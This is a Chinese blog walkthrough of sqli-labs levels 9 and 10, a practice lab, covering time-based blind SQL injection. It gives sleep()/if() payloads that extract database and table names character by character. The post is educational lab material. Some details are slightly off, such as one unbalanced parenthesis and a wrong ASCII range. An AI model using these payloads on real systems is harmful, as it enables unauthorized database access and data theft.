sqli-labs通关(九)(十)

已于 2023-05-03 15:04:26 修改
阅读量144 收藏
点赞数
分类专栏: sqli-labs通关 文章标签: 数据库 mysql
于 2023-05-03 14:59:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/130472549
版权

第九关

无论我们输入什么,都是显示同一个结果,没有任何区别 

那这一关可能就是是基于时间的盲注 ,用到sleep()函数,输入

?id=1'and sleep(5)--+ 

 发现页面响应时间延迟了五秒,说明我们的sleep()函数执行了

还要用到if()函数

if(expr1,expr2,expr3) 如果expr1为真,则if函数执行expr2语句,否则if函数执行expr3语句

判断数据库名的长度,如果数据库名字长度大于9,则执行sleep(5),延迟五秒响应,否则执行1

?id=1'and if(length((select database())>9,sleep(5),1)--+

 接着判断数据库名,数据库名应该是大小写字母组成,对应的ASCII码应该是从41到112的范围内,可以用>或<确定范围再用二分法慢慢确定,也可以直接用=一个一个地遍历

?id=1'and if(ascii(substr((select database()),1,1))<91,sleep(5),1)--+

这是对应的ASCII码表

ASCII 码字符ASCII 码字符ASCII 码字符ASCII 码字符
十进位十六进位十进位十六进位十进位十六进位十进位十六进位
0322005638808050P10468h
03321!05739908151Q10569i
03422"0583A:08252R1066Aj
03523#0593B;08353S1076Bk
03624$0603C<08454T1086Cl
03725%0613D=08555U1096Dm
03826&0623E>08656V1106En
03927'0633F?08757W1116Fo
04028(06440@08858X11270p
04129)06541A08959Y11371q
0422A*06642B0905AZ11472r
0432B+06743C0915B[11573s
0442C,06844D0925C\11674t
0452D-06945E0935D]11775u
0462E.07046F0945E^11876v
0472F/07147G0955F_11977w
04830007248H09660`12078x
04931107349I09761a12179y
0503220744AJ09862b1227Az
0513330754BK09963c1237B{
0523440764CL10064d1247C|
0533550774DM10165e1257D}
0543660784EN10266f1267E~
0553770794FO10367g1277FDEL

 接着判断所有表名的长度

?id=1'and if(length((select table_name from information_schema.tables where table_schema=database()))<50,sleep(5),1)--+

 判断所有表名

?id=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))=41,sleep(5),1)--+

第十关 

跟第九关的区别就是把单引号改成双引号

 

幕溪WM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第九&第(延时盲注)
qq_42266432的博客
08-20 1107
刚开始进入这一时对这一进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标题,第九叫"time based-single quotes"基于时间—单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下: http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ 然后发现这个请求延时了3S 进行到这里,就有了一套完整的思路,时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI
sqli-labs-master闯游戏第九
FourthGuy的博客
10-09 2126
文章目录前言一、Less-9分析下源码中的函数总结 前言 本题用到了在第八介绍的两个函数 ascii()和substring(),和两个新的函数sleep(),if() 大家第一次接触后一定要反复练习,并且思考为什么要这么做 一、Less-9 惯例,我们先写以下语句 ?id=1 接着 ?id=1' ?id=1" 发现返回的资源都是上面的样子 猜想可能是闭了报错,且无论语句正确与否返回的结果都是相同的 我们尝试基于时间的注入 这里介绍两个函数 sleep()参数写数字,此函数用于将时间延迟.
sqli-labs卡9(基于get提交的单引号闭合的时间盲注)通关思路
zyh1588的博客
10-31 595
小白回顾sqli-labs靶场第九(时间盲注)
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1598
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs第九
qq_56726035的博客
04-08 687
sqli-labs第九
sqli-labs:第九
J_linnb的博客
05-03 1006
【代码】sqli-labs:第九
sqli-labs靶场第九
gou1791241251的博客
12-26 1515
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六的盲注,把条件换成沉睡10秒即可。 ...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
详细sqli-labs(1-20)通关讲解
最新发布
05-18
详细sqli-labs(1-20)通关讲解
2020-10-23-sqli-labs.md
01-24
sqli-labs靶场通关教程
sqli-labs less9详解
Brilliant_orange的博客
11-10 1383
【写在前面:建议:如果对SQL注入中SQL语句不熟悉的可以先看看如果看懂了这篇,这题就当应用了】
sqli-labs 9~10 多命通关攻略(Python3 自动化实现时间盲注)
两个月亮
01-13 775
三种输入,sqli-labs 的回显区域显示的内容均,因此我们只能使用基于时间的注入方式。
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1017
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
sqli-labs 9
qq_55777983的博客
07-29 389
less -9 很快啊,我们来到了第9题 掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数 所以也叫延时注入 我们惊讶的发现原本应该报错的?id=1’都是这样的回显 尝试了很多只会回显 显然这题使得布尔型盲注都无法使用 所以我们使用延时注入来判断语句的对错 ?id=1’ and sleep(5) --+ 我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒 由于我们的1’成功闭合前面–+又注释了后面 而and连接了前面正确的语句所以执行了后
sqli-labs(9)
weixin_30302609的博客
05-23 128
基于时间的GET单引号盲注 0x01爱之初试探 在我们注入了SQL代码之后,存在以下两种情况: 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)。 接下来,学习基于时间型SQ...
详细sqli-labs(1-65)通关讲解
热门推荐
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQL注入之sqli-labs(
m0_60716947的博客
04-30 317
目录 ()第五到六 (1)第五 (2)第五 (3)第五 (4)第五 (5)第五 (6)第五 (7)第六 (8)第六 (9)第六 (10)第六 (11)第六 (12)第六sqli-labs 总结 ()第五到六 (1)第五 首页提醒我们使用id 值进行注入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
sqli-labs通关28
03-05
通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值